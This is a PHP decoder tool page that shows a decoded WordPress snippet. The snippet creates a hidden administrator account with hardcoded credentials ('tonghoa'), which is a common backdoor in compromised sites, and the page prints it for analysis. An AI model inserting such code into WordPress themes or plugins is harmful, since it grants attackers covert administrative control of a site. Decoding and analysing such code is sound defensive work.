Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

function wpb_admin_account() { $user = 'tonghoa'; $pass = 'tonghoa278'; $em..

Decoded Output download

<?  function wpb_admin_account() { 
    $user = 'tonghoa'; 
    $pass = 'tonghoa278'; 
    $email = '[email protected]'; 
    if (!username_exists($user) && !email_exists($email)) { 
        $user_id = wp_create_user($user, $pass, $email); 
        $user = new WP_User($user_id); 
        $user->set_role('administrator'); 
    } 
} ?>

Did this file decode correctly?

Original Code

function wpb_admin_account() {
    $user = 'tonghoa';
    $pass = 'tonghoa278';
    $email = '[email protected]';
    if (!username_exists($user) && !email_exists($email)) {
        $user_id = wp_create_user($user, $pass, $email);
        $user = new WP_User($user_id);
        $user->set_role('administrator');
    }
}

Function Calls

None

Variables

None

Stats

MD5 8fbbfe99863370914a116a75bf2682cb
Eval Count 0
Decode Time 87 ms